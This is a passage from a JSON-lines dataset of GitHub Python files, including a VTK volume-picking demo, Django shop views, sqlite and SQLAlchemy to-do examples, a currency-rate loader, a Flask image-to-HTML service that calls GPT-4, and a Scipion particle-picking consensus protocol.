Sample/chapter16/Section16-3/モデルclfを使って訓練データで学習する.py","file_name":"モデルclfを使って訓練データで学習する.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9030011799","text":"#!/usr/bin/env python\n\n##\n# This is an example of how to use the vtkVolumePicker.\n##\n\nimport math\nimport vtk\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n#---------------------------------------------------------\n# renderer and interactor\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n#---------------------------------------------------------\n# read the volume\nreader = vtk.vtkImageReader2()\nreader.SetDataExtent(0,63,0,63,0,92)\nreader.SetFileNameSliceOffset(1)\nreader.SetDataScalarTypeToUnsignedShort()\nreader.SetDataByteOrderToLittleEndian()\nreader.SetFilePrefix(str(VTK_DATA_ROOT) + \"/Data/headsq/quarter\")\nreader.SetDataSpacing(3.2,3.2,1.5)\n\n#---------------------------------------------------------\n# set up the volume rendering\nvolumeMapper = vtk.vtkVolumeTextureMapper3D()\nvolumeMapper.SetInputConnection(reader.GetOutputPort())\nvolumeMapper.CroppingOn()\nvolumeMapper.SetCroppingRegionPlanes((0.0, 141.6, 0.0, 201.6, 0.0, 138.0))\n\nvolumeColor = vtk.vtkColorTransferFunction()\nvolumeColor.AddRGBPoint(0,0.0,0.0,0.0)\nvolumeColor.AddRGBPoint(180,0.3,0.1,0.2)\nvolumeColor.AddRGBPoint(1000,1.0,0.7,0.6)\nvolumeColor.AddRGBPoint(2000,1.0,1.0,0.9)\n\nvolumeScalarOpacity = vtk.vtkPiecewiseFunction()\nvolumeScalarOpacity.AddPoint(0,0.0)\nvolumeScalarOpacity.AddPoint(180,0.0)\nvolumeScalarOpacity.AddPoint(1000,0.2)\nvolumeScalarOpacity.AddPoint(2000,0.8)\n\nvolumeGradientOpacity = vtk.vtkPiecewiseFunction()\nvolumeGradientOpacity.AddPoint(0,0.0)\nvolumeGradientOpacity.AddPoint(90,0.5)\nvolumeGradientOpacity.AddPoint(100,1.0)\n\nvolumeProperty = vtk.vtkVolumeProperty()\nvolumeProperty.SetColor(volumeColor)\nvolumeProperty.SetScalarOpacity(volumeScalarOpacity)\nvolumeProperty.SetGradientOpacity(volumeGradientOpacity)\nvolumeProperty.SetInterpolationTypeToLinear()\nvolumeProperty.ShadeOff()\nvolumeProperty.SetAmbient(0.6)\nvolumeProperty.SetDiffuse(0.6)\nvolumeProperty.SetSpecular(0.1)\n\nvolume = vtk.vtkVolume()\nvolume.SetMapper(volumeMapper)\nvolume.SetProperty(volumeProperty)\n\n#---------------------------------------------------------\n# Do the surface rendering\nboneExtractor = vtk.vtkMarchingCubes()\nboneExtractor.SetInputConnection(reader.GetOutputPort())\nboneExtractor.SetValue(0,1150)\n\nboneNormals = vtk.vtkPolyDataNormals()\nboneNormals.SetInputConnection(boneExtractor.GetOutputPort())\nboneNormals.SetFeatureAngle(60.0)\n\nboneStripper = vtk.vtkStripper()\nboneStripper.SetInputConnection(boneNormals.GetOutputPort())\n\nboneLocator = vtk.vtkCellLocator()\nboneLocator.SetDataSet(boneExtractor.GetOutput())\nboneLocator.LazyEvaluationOn()\n\nboneMapper = vtk.vtkPolyDataMapper()\nboneMapper.SetInputConnection(boneStripper.GetOutputPort())\nboneMapper.ScalarVisibilityOff()\n\nboneProperty = vtk.vtkProperty()\nboneProperty.SetColor(1.0,1.0,0.9)\n\nbone = vtk.vtkActor()\nbone.SetMapper(boneMapper)\nbone.SetProperty(boneProperty)\n\n#---------------------------------------------------------\n# Create an image actor\ntable = vtk.vtkLookupTable()\ntable.SetRange(0,2000)\ntable.SetRampToLinear()\ntable.SetValueRange(0,1)\ntable.SetHueRange(0,0)\ntable.SetSaturationRange(0,0)\n\nmapToColors = vtk.vtkImageMapToColors()\nmapToColors.SetInputConnection(reader.GetOutputPort())\nmapToColors.SetLookupTable(table)\nmapToColors.Update()\n\nimageActor = vtk.vtkImageActor()\nimageActor.GetMapper().SetInputConnection(mapToColors.GetOutputPort())\nimageActor.SetDisplayExtent(32,32,0,63,0,92)\n\n#---------------------------------------------------------\n# make a transform and some clipping planes\ntransform = vtk.vtkTransform()\ntransform.RotateWXYZ(-20,0.0,-0.7,0.7)\n\nvolume.SetUserTransform(transform)\nbone.SetUserTransform(transform)\nimageActor.SetUserTransform(transform)\n\nc = volume.GetCenter()\n\nvolumeClip = vtk.vtkPlane()\nvolumeClip.SetNormal(0,1,0)\nvolumeClip.SetOrigin(c[0],c[1],c[2])\n\nboneClip = vtk.vtkPlane()\nboneClip.SetNormal(1,0,0)\nboneClip.SetOrigin(c[0],c[1],c[2])\n\nvolumeMapper.AddClippingPlane(volumeClip)\nboneMapper.AddClippingPlane(boneClip)\n\n#---------------------------------------------------------\nren.AddViewProp(volume)\nren.AddViewProp(bone)\nren.AddViewProp(imageActor)\n\ncamera = ren.GetActiveCamera()\ncamera.SetFocalPoint(c[0],c[1],c[2])\ncamera.SetPosition(c[0] + 500,c[1] - 100,c[2] - 100)\ncamera.SetViewUp(0,0,-1)\n\nrenWin.Render()\n\n#---------------------------------------------------------\n# the cone points along the -x axis\nconeSource = vtk.vtkConeSource()\nconeSource.CappingOn()\nconeSource.SetHeight(12)\nconeSource.SetRadius(5)\nconeSource.SetResolution(31)\nconeSource.SetCenter(6,0,0)\nconeSource.SetDirection(-1,0,0)\n\nconeMapper = vtk.vtkDataSetMapper()\nconeMapper.SetInputConnection(coneSource.GetOutputPort())\n\nredCone = vtk.vtkActor()\nredCone.PickableOff()\nredCone.SetMapper(coneMapper)\nredCone.GetProperty().SetColor(1,0,0)\n\ngreenCone = vtk.vtkActor()\ngreenCone.PickableOff()\ngreenCone.SetMapper(coneMapper)\ngreenCone.GetProperty().SetColor(0,1,0)\n\n# Add the two cones (or just one, if you want)\nren.AddViewProp(redCone)\nren.AddViewProp(greenCone)\n\n#---------------------------------------------------------\n# the picker\npicker = vtk.vtkVolumePicker()\npicker.SetTolerance(1e-6)\npicker.SetVolumeOpacityIsovalue(0.1)\n# locator is optional, but improves performance for large polydata\npicker.AddLocator(boneLocator)\n\n# A function to point an actor along a vector\ndef PointCone(actor,nx,ny,nz):\n actor.SetOrientation(0.0, 0.0, 0.0)\n n = math.sqrt(nx**2 + ny**2 + nz**2)\n if (nx < 0.0):\n actor.RotateWXYZ(180, 0, 1, 0)\n n = -n\n actor.RotateWXYZ(180, (nx+n)*0.5, ny*0.5, nz*0.5)\n\n# A function to move the cursor with the mouse\ndef MoveCursor(iren,event=\"\"):\n renWin.HideCursor()\n x,y = iren.GetEventPosition()\n picker.Pick(x, y, 0, ren)\n p = picker.GetPickPosition()\n n = picker.GetPickNormal()\n redCone.SetPosition(p[0],p[1],p[2])\n PointCone(redCone,n[0],n[1],n[2])\n greenCone.SetPosition(p[0],p[1],p[2])\n PointCone(greenCone,-n[0],-n[1],-n[2])\n iren.Render()\n\n#---------------------------------------------------------\n# custom interaction\niren.AddObserver(\"MouseMoveEvent\", MoveCursor)\n\niren.Start()\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Examples/VolumeRendering/Python/VolumePicker.py","file_name":"VolumePicker.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"31641861366","text":"from django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\n\nimport settings\nfrom mainapp.forms import MailForm\nfrom mainapp.models import Products, Abonements, Favorite\n\n\ndef index(request):\n if request.method == 'POST':\n form = MailForm(request.POST)\n if form.is_valid():\n form = form.save(commit=False)\n messages = f'Абонемент {form.name} \\nФИ: {form.full_name} ({form.email})\\nТелефон: {form.tel}'\n res = send_mail(settings.EMAIL_TITLE, messages, settings.EMAIL_HOST_USER, ['pasha3232@inbox.ru'])\n if res:\n form.save()\n return HttpResponseRedirect(reverse('mainapp:index'))\n else:\n form = MailForm()\n context = {\n 'form': form,\n }\n return render(request, 'mainapp/index.html', context)\n\n\ndef tovari(request):\n products = Products.objects.all()\n context = {\n 'title': 'Каталог',\n 'products': products,\n }\n return render(request, 'mainapp/tovari.html', context)\n\n\ndef catalog(request):\n products = Products.objects.filter(counts__gt=0)\n context = {\n 'title': 'Каталог',\n 'products': products,\n\n }\n return render(request, 'mainapp/tovari.html', context)\n\n\ndef abonements(request):\n abonements = Abonements.objects.all()\n context = {\n 'title': 'Абонементы',\n 'abonements': abonements,\n }\n return render(request, 'mainapp/abonements.html', context)\n\n\ndef favorite(request):\n favor = Favorite.objects.filter(user=request.user)\n context = {\n 'title': 'избранное',\n 'favorite': favor,\n }\n return render(request, 'mainapp/favorite.html', context)\n\n\ndef add_favorite(request, pk):\n news = get_object_or_404(Products, id=pk)\n\n Favorite.objects.get_or_create(\n news=news,\n user=request.user\n )\n return HttpResponseRedirect(reverse('mainapp:index'))\n\n\ndef remove_favorite(request, pk):\n favor = get_object_or_404(Favorite, id=pk)\n favor.delete()\n return HttpResponseRedirect(reverse('mainapp:favorite'))\n\n\n","repo_name":"Pavlik1122/Sport-club-NIRVANA","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70695001834","text":"import sqlite3\nfrom employee import Employee\n\n# This method creates the file if it does not exist\n# if it exists then it just connects\nconn = sqlite3.connect('employee.db')\n\n# create a curson\nc = conn.cursor()\n\n# create an employee table\n# Need to run this only once\n# c.execute(\"\"\"CREATE TABLE employees(\n# \t\tfirst text,\n# \t\tlast text,\n# \t\tpay integer\n# \t\t)\"\"\")\n\nemp_1 = Employee(\"John\",\"Doe\",80000)\nemp_2 = Employee(\"Jane\",\"Doe\",90000)\n\n\n\n# insert\n# c.execute(\"INSERT INTO employees VALUES ('Corey','Shafer',50000)\")\n# c.execute(\"INSERT INTO employees VALUES ('Mary','Shafer',70000)\")\n\n# first proper way\n# c.execute(\"INSERT INTO employees VALUES (?,?,?)\", (emp_1.first, emp_1.last, emp_1.pay))\n\n# commits the current transaction\n# conn.commit()\n\n# second proper way\n# c.execute(\"INSERT INTO employees VALUES (:first,:last,:pay)\", {'first':emp_2.first, 'last':emp_2.last, 'pay':emp_2.pay})\n\n# commits the current transaction\n# conn.commit()\n\n# select\n# first approach\nc.execute(\"SELECT * FROM employees WHERE last=?\", ('Shafer',))\n\nprint(c.fetchall())\n\n# second approach\nc.execute(\"SELECT * FROM employees WHERE last=:last\", {'last':'Doe'})\n\nprint(c.fetchall())\n\n# commits the current transaction\nconn.commit()\n\n# close the connection\nconn.close()","repo_name":"tjkhara/notes","sub_path":"python/courses/corey_shafer/sqllite/sqlite_demo.py","file_name":"sqlite_demo.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72965869353","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine, Column, Integer, String, Date\nfrom datetime import datetime, timedelta\nfrom sqlalchemy.orm import sessionmaker\n\n\nBase = declarative_base()\ntoday = datetime.now().date()\n\n\nclass Task(Base):\n __tablename__ = 'task'\n\n id = Column(Integer, primary_key=True)\n task = Column(String)\n deadline = Column(Date, default=today)\n\n def __repr__(self):\n return self.task\n\n\ndef print_day_tasks(day, day_name=\"\"):\n if not day_name:\n day_name = day.strftime(\"%A\")\n\n print(f\"{day_name} {day.strftime('%d %b')}:\")\n\n rows = session.query(Task).filter(Task.deadline == day).all()\n for i, row in enumerate(rows):\n print(f\"{i}. {row}\")\n else:\n if not rows:\n print(\"Nothing to do!\")\n print()\n\n\ndef print_weeks_tasks():\n for i in range(7):\n cur_day = today + timedelta(days=i)\n print_day_tasks(cur_day)\n\n\ndef print_all_tasks():\n print(\"All tasks:\")\n\n rows = session.query(Task).order_by(Task.deadline)\n for i, row in enumerate(rows):\n print(f\"{i}. {row.task}. {row.deadline.strftime('%d %b')}\")\n\n\ndef print_missed_tasks():\n print(\"Missed tasks:\")\n\n rows = session.query(Task).filter(Task.deadline < today).order_by(Task.deadline)\n for i, row in enumerate(rows):\n print(f\"{i}. {row.task}. {row.deadline.strftime('%d %b')}\")\n else:\n if not rows:\n print(\"Nothing is missed!\")\n print()\n\n\ndef add_new_task():\n task_name = input(\"Enter task\\n\")\n deadline_str = input(\"Enter deadline\\n\")\n deadline_date = datetime.strptime(deadline_str, \"%Y-%m-%d\")\n\n new_row = Task(task=task_name, deadline=deadline_date)\n session.add(new_row)\n session.commit()\n\n print(\"The task has been added!\\n\")\n\n\ndef delete_task():\n print(\"Chose the number of the task you want to delete:\")\n\n rows = session.query(Task).order_by(Task.deadline)\n for i, row in enumerate(rows):\n print(f\"{i}. {row.task}. {row.deadline.strftime('%d %b')}\")\n\n num_del = int(input())\n session.delete(rows[num_del])\n session.commit()\n\n print(\"The task has been deleted!\\n\")\n\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\nBase.metadata.create_all(engine)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nwhile True:\n print(\"1) Today's tasks\\n\"\n \"2) Week's tasks\\n\"\n \"3) All tasks\\n\"\n \"4) Missed tasks\\n\"\n \"5) Add task\\n\"\n \"6) Delete task\\n\"\n \"0) Exit\")\n user_input = input()\n print()\n\n if user_input == \"1\":\n print_day_tasks(today, \"Today\")\n elif user_input == \"2\":\n print_weeks_tasks()\n elif user_input == \"3\":\n print_all_tasks()\n elif user_input == \"4\":\n print_missed_tasks()\n elif user_input == \"5\":\n add_new_task()\n elif user_input == \"6\":\n delete_task()\n\n else:\n print(\"Bye!\")\n break\n","repo_name":"BuyankinM/JetBrainsAcademyProjects","sub_path":"To-Do List/To-Do List/task/todolist/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44618859745","text":"import mysql.connector\nimport requests\n\nclass waluta:\n nazwa=\"\"\n kurs=\"\"\n def __init__(self,nazwa_arg,kurs_arg):\n self.nazwa=nazwa_arg\n self.kurs=kurs_arg\n def dane(self):\n print(self.nazwa, self.kurs)\n\nclass tab_waluty:\n numer=\"\"\n data=\"\"\n def __init__(self,numer_arg,data_arg):\n self.numer=numer_arg\n self.data=data_arg\n def dane(self):\n print(self.numer, self.data)\n\ndef wybrane(tablica,nazwa):\n # print(tablica)\n query = \"INSERT INTO \"+nazwa+\" VALUES (NULL,'\"+xml.numer+\"','\"+xml.data+\"',\"+tablica[0].kurs+\");\"\n print(query)\n kursor.execute(query)\n\n\npath = 'http://api.nbp.pl/api/exchangerates/tables/A?format=xml'\nr = requests.get(path)\n# dane\nwith open('dane.xml', 'wb') as f:\n f.write(r.content)\n\nfrom xml.etree import ElementTree\n\ntree = ElementTree.parse(\"dane.xml\")\nroot = tree.getroot()\n\ntabela = []\nfor element in root.findall(\".//Rate\"):\n nazwa = element.find('Code').text\n kurs = element.find('Mid').text\n wal = waluta(nazwa,kurs)\n tabela.append(wal)\n# print(tabela)\n\n# nazwa i data\nfor element in root.findall('ExchangeRatesTable'):\n nr_tabeli = element.find('No').text\n data = element.find('EffectiveDate').text\n xml = tab_waluty(nr_tabeli,data)\n# print(nr_tabeli)\n# print(data)\n\n# sprawdzanie danych, zeby sie nie powtarzały\n\nbaza = mysql.connector.connect(host='localhost', user='root', password='', database='waluty')\nkursor = baza.cursor()\nquery = \"SELECT nr_tabeli,id_wiersza FROM kursy GROUP BY id_wiersza ORDER BY id_wiersza desc LIMIT 1;\"\nkursor.execute(query)\nnr_tabeli_w_bazie = str(kursor.fetchall()).replace(\"'\", \"\").replace(\")\", \"\").replace(\"(\", \"\").replace(\"[\", \"\").replace(\"]\", \"\").split(\",\")[0]\n# print(nr_tabeli_w_bazie)\nbaza.commit()\nerror = 0\nif nr_tabeli_w_bazie == xml.numer:\n error = 1\n print(\"Dane w bazie są aktualne!\")\n\n# wysyłanie danych do bazy wszystkich walut\nif error == 0:\n print('Zapytania do tabeli \"kursy\"')\n for i in tabela:\n baza = mysql.connector.connect(host='localhost', user='root', password='', database='waluty')\n kursor = baza.cursor()\n query = \"INSERT INTO kursy VALUES (NULL,'\"+xml.numer+\"','\"+xml.data+\"','\"+i.nazwa+\"',\"+i.kurs+\");\"\n kursor.execute(query)\n baza.commit()\n print(query)\n print(80*'-')\n\n# wybrane waluty i wysłanie ich do bazy\nif error == 0:\n GBP = []\n USD = []\n EUR = []\n for i in tabela:\n if i.nazwa == 'USD':\n USD.append(i)\n continue\n if i.nazwa == 'GBP':\n GBP.append(i)\n continue\n if i.nazwa == 'EUR':\n EUR.append(i)\n continue\n # print(GBP)\n # print(USD)\n # print(EUR)\n print('Zapytania do tabel z wybranymi walutami')\n baza = mysql.connector.connect(host='localhost', user='root', password='', database='waluty')\n kursor = baza.cursor()\n wybrane(GBP,'gbp')\n wybrane(USD, 'usd')\n wybrane(EUR, 'eur')\n baza.commit()\n print(80 * '-')\n\n print(\"Dane zostały wysłane do bazy danych!\")\n#print(tabela)","repo_name":"rauser17/walutyswiata","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20942203262","text":"import fileinput\n\n# parse the GAF record and count how many reads\n# in each profile (mapping quality x perfect alignement x aligment score)\n# mapping quality: number. '-1' for unmapped reads\n# perfect: boolean to specify if the reads aligned perfectly\n# alignment score: value of the AS tag\n\n# to tally the number of reads/records in each profile\nrecords = {}\n\nfor line in fileinput.input():\n line = line.rstrip().split('\\t')\n ## handle unmapped reads\n if line[9] == \"*\":\n line[11] = '-1'\n ## extract AS tag\n as_tag = False\n for ii in range(11, len(line)):\n tag = line[ii].split(':')\n if tag[0] == 'AS':\n as_tag = tag[2]\n break\n ## check if perfectly aligned\n perfect = False\n if line[9] != \"*\" and line[9] == line[10]:\n perfect = True\n ## increment records\n rid = '{}\\t{}\\t{}'.format(line[11], perfect, as_tag)\n if rid not in records:\n records[rid] = 1\n else:\n records[rid] += 1\n\n# print the counts for each rid/profiles\nfor rec in records.keys():\n print('{}\\t{}'.format(records[rec], rec))\n","repo_name":"ComparativeGenomicsToolkit/cactus","sub_path":"doc/mc-paper/hprc/resources/compute_mapping_stats_gaf.py","file_name":"compute_mapping_stats_gaf.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"72"} +{"seq_id":"23112414656","text":"import os\nimport base64\nfrom io import BytesIO\nfrom flask import Flask, request, jsonify\nimport torch\nfrom transformers import GPT2Tokenizer\nfrom PIL import Image\nfrom model import GPT2DecoderWithImageFeatures\nfrom transformers import ViTModel\nimport numpy as np\nfrom utils import special_tokens_dict\nfrom generate import generate_code\nimport requests\n\napp = Flask(__name__)\n\n# Load the tokenizer, ViT model, and decoder\ntokenizer = GPT2Tokenizer.from_pretrained('gpt2')\ntokenizer.add_special_tokens(special_tokens_dict)\nvit_model = ViTModel.from_pretrained('google/vit-base-patch16-224').base_model\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nvit_model.to(device)\n\ndecoder = GPT2DecoderWithImageFeatures(input_size=768)\n# Update the GPT2 model with the new tokenizer\ndecoder.gpt.resize_token_embeddings(len(tokenizer))\n\ndecoder.load_state_dict(torch.load(\"best_decoder.pth\", map_location=device))\ndecoder.to(device)\n\n# Add this method to save the received image\ndef save_image(image_data):\n img_data = base64.b64decode(image_data)\n img = Image.open(BytesIO(img_data))\n image_path = \"received_image.png\"\n img.save(image_path)\n return image_path\n\n\n@app.route('/generate_code', methods=['POST'])\ndef generate_code_endpoint():\n api_key = request.json['api_key']\n image_data = request.json['image_data']\n prompt = request.json['prompt']\n\n image_path = save_image(image_data)\n print(image_path)\n generated_code = generate_code(image_path, tokenizer, vit_model, decoder)\n print(generated_code)\n response_text = call_gpt3(api_key, generated_code,prompt)\n print(response_text)\n return jsonify({\"generated_html\": response_text})\n\n\ndef call_gpt3(api_key, generated_code, prompt=\"for an online shop\"):\n system_prompt = \"You are a useful assistant that helping people to design website, do not include any additional information in answer.\"\n user_prompt = f'''\nPlease generate the proper content for `...` based on the purpose of the site, style the HTML using Tailwind CSS framework, the purpose of the site is for {prompt}\n\nDSL-to-HTML mapping:\nheader ->
...
\nbtn-inactive -> \n\nDSL code:\n{generated_code}\n\nOutput the minified HTML and CSS code!\n''' \n print(user_prompt)\n chat_gpt_request = get_configured_chat_gpt_request([\n {\n \"role\": \"system\",\n \"content\": system_prompt\n },\n {\"role\": \"user\", \"content\": user_prompt},\n ])\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {api_key}\"\n }\n\n try:\n response = requests.post(\n \"https://api.openai.com/v1/chat/completions\", json=chat_gpt_request, headers=headers)\n result = response.json()\n print(result)\n return result['choices'][0]['message']['content']\n except Exception as error:\n print(f\"Error: {error}\")\n return None\n\n\ndef get_configured_chat_gpt_request(messages):\n return {\n \"messages\": messages,\n \"max_tokens\": 3000,\n \"model\": \"gpt-4\",\n }\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=os.environ.get('PORT', 8080), debug=True)\n","repo_name":"mzbac/image2dsl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37591872274","text":"# **************************************************************************\n# *\n# * Authors: Carlos Oscar Sorzano (coss@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'coss@cnb.csic.es'\n# *\n# **************************************************************************\n\"\"\"\nConsensus picking protocol\n\"\"\"\nimport os\nfrom math import sqrt\n\nimport pyworkflow.protocol.params as params\nfrom pyworkflow.em.protocol.protocol_particles import ProtParticlePicking\nfrom pyworkflow.protocol.constants import *\nfrom pyworkflow.em.data import Coordinate\n\nimport numpy as np\n\n\nclass XmippProtConsensusPicking(ProtParticlePicking):\n \"\"\"\n Protocol to estimate the agreement between different particle picking algorithms. The protocol\n takes several Sets of Coordinates calculated by different programs and/or different parameter\n settings. Let's say we consider N independent pickings. Then, a coordinate is considered\n to be a correct particle if M pickers have selected the same particle (within a radius in\n pixels specified in the form).\n \n If you want to be very strict, then set M=N; that is, a coordinate represents a particle if\n it has been selected by all particles (this is the default behaviour). Then you may relax\n this condition by setting M=N-1, N-2, ...\n \n If you want to be very flexible, set M=1, in this way it suffices that 1 picker has\n selected the coordinate to be considered as a particle. Note that in this way, the cleaning\n of the dataset has to be performed by other means (screen particles, 2D and 3D \n classification, ...).\n \"\"\"\n _label = 'consensus picking'\n \n def __init__(self, **args):\n ProtParticlePicking.__init__(self, **args)\n self.stepsExecutionMode = STEPS_SERIAL\n\n def _defineParams(self, form):\n form.addSection(label='Input')\n form.addParam('inputCoordinates', params.MultiPointerParam, pointerClass='SetOfCoordinates',\n label=\"Input coordinates\",\n help='Select the set of coordinates to compare')\n form.addParam('consensusRadius',params.IntParam, default=10, label=\"Radius\",\n help=\"All coordinates within this radius (in pixels) are presumed to correspond to the same particle\")\n form.addParam('consensus',params.IntParam, default=-1, label=\"Consensus\", expertLevel=LEVEL_ADVANCED,\n help=\"How many times need a particle to be selected to be considered as a consensus particle. \"\\\n \"Set to -1 to indicate that it needs to be selected by all algorithms. Set to 1 to indicate that \"\\\n \"it suffices that only 1 algorithm selects the particle\")\n\n form.addParallelSection(threads=4, mpi=0)\n \n#--------------------------- INSERT steps functions -------------------------------------------- \n def _insertAllSteps(self):\n deps = []\n for micrograph in self.inputCoordinates[0].get().getMicrographs():\n stepId = self._insertFunctionStep(\"calculateConsensusStep\", \n micrograph.getObjId(), prerequisites=[])\n deps.append(stepId)\n self._insertFunctionStep(\"createOutputStep\", prerequisites=deps)\n \n def getInputMicrographs(self):\n return self.inputCoordinates[0].get().getMicrographs()\n \n def _summary(self):\n message = []\n for i, coordinates in enumerate(self.inputCoordinates):\n protocol = self.getMapper().getParent(coordinates.get())\n message.append(\"Method %d %s\" % (i+1, protocol.getClassLabel()))\n message.append(\"Radius = %d\" % self.consensusRadius)\n message.append(\"Consensus = %d\" % self.consensus)\n return message\n \n def _methods(self):\n return [] \n \n def calculateConsensusStep(self, micId):\n # Take the sampling rates\n Tm = []\n for coordinates in self.inputCoordinates:\n Tm.append(coordinates.get().getMicrographs().getSamplingRate())\n \n # Get all coordinates for this micrograph\n coords = []\n Ncoords = 0\n n=0\n for coordinates in self.inputCoordinates:\n coordArray = np.asarray([x.getPosition() \n for x in coordinates.get().iterCoordinates(micId)])\n coordArray *= Tm[n]/Tm[0]\n coords.append(coordArray)\n Ncoords += coordArray.shape[0]\n n+=1\n \n allCoords = np.zeros([Ncoords,2])\n votes = np.zeros(Ncoords)\n \n # Add all coordinates in the first method\n N0 = coords[0].shape[0]\n inAllMicrographs = self.consensus <= 0 or self.consensus == len(self.inputCoordinates)\n if N0==0 and inAllMicrographs:\n return\n elif N0>0:\n allCoords[0:N0,:] = coords[0]\n votes[0:N0] = 1\n \n # Add the rest of coordinates\n Ncurrent = N0\n for n in range(1, len(self.inputCoordinates)):\n for coord in coords[n]:\n if Ncurrent>0:\n dist = np.sum((coord - allCoords[0:Ncurrent])**2, axis=1)\n imin = np.argmin(dist)\n if sqrt(dist[imin]) < self.consensusRadius:\n newCoord = (votes[imin]*allCoords[imin,]+coord)/(votes[imin]+1)\n allCoords[imin,] = newCoord\n votes[imin] += 1\n else:\n allCoords[Ncurrent,:] = coord\n votes[Ncurrent] = 1\n Ncurrent += 1\n else:\n allCoords[Ncurrent, :] = coord\n votes[Ncurrent] = 1\n Ncurrent += 1\n\n # Select those in the consensus\n if self.consensus <= 0:\n consensus = len(self.inputCoordinates)\n else:\n consensus = self.consensus.get()\n consensusCoords = allCoords[votes>=consensus,:]\n jaccardIdx = float(len(consensusCoords))/(float(len(allCoords))/len(self.inputCoordinates))\n # COSS: Possible problem with concurrent writes\n with open(self._getExtraPath('jaccard.txt'), \"a\") as fhJaccard:\n fhJaccard.write(\"%d %f\\n\"%(micId,jaccardIdx))\n \n # Write the consensus file only if there\n # are some coordinates (size > 0)\n if consensusCoords.size:\n np.savetxt(self._getExtraPath('consensus_%06d.txt' % micId), consensusCoords)\n \n def createOutputStep(self):\n firstCoords = self.inputCoordinates[0].get()\n inputMics = firstCoords.getMicrographs()\n setOfCoordinates = self._createSetOfCoordinates(inputMics)\n setOfCoordinates.setBoxSize(firstCoords.getBoxSize())\n \n # Read all consensus particles\n for micrograph in inputMics:\n fnTmp = self._getExtraPath('consensus_%06d.txt' % micrograph.getObjId())\n if os.path.exists(fnTmp):\n coords = np.loadtxt(fnTmp)\n if coords.size == 2: # special case with only one coordinate in consensus\n coords = [coords]\n for coord in coords:\n aux = Coordinate()\n aux.setMicrograph(micrograph)\n aux.setX(coord[0])\n aux.setY(coord[1])\n setOfCoordinates.append(aux)\n #cleanPath(fnTmp)\n\n # Set output\n self._defineOutputs(outputCoordinates=setOfCoordinates)\n \n for coordinates in self.inputCoordinates:\n self._defineSourceRelation(coordinates, self.outputCoordinates)\n","repo_name":"I2PC/scipion-web","sub_path":"pyworkflow/em/packages/xmipp3/protocol_particle_pick_consensus.py","file_name":"protocol_particle_pick_consensus.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3228636654","text":"# -*- coding: utf-8 -*-\nfrom core import resource\nfrom core.jsonresponse import create_response\nfrom core.exceptionutil import unicode_full_stack\n\nimport models as apps_models\nfrom mall.models import Order\nfrom modules.member.models import Member\n\n\ndef _get_order_id_to_id(evaluates):\n\torder_ids = [p.order_id for p in evaluates]\n\treturn {o.order_id: o.id for o in Order.objects.filter(order_id__in=order_ids)}\n\nclass GetProductEvaluatesStatus(resource.Resource):\n\tapp = 'apps/evaluate'\n\tresource = 'get_product_evaluates_status'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\t个人中心-待评价订单,获取待评价订单的评价状态\n\t\t@params woid, member_id\n\t\t@return:{\n\t\t\t\t \"orders\": [\n\t\t\t\t\t {'order_id':6789,\n\t\t\t\t\t 'order_is_reviewed':True,\n\t\t\t\t\t 'order_product':\n\t\t\t\t\t\t [{'product_id':3333333,\n\t\t\t\t\t\t\t'order_has_product_id':5555555,\n\t\t\t\t\t\t\t'has_reviewed_picture':True,\n\t\t\t\t\t\t\t'has_reviewed':True\n\t\t\t\t\t\t\t}]\n\t\t\t\t\t }\n\t\t\t\t\t]\n\t\t\t\t}\n\t\t\"\"\"\n\n\t\towner_id = request.GET.get('woid', 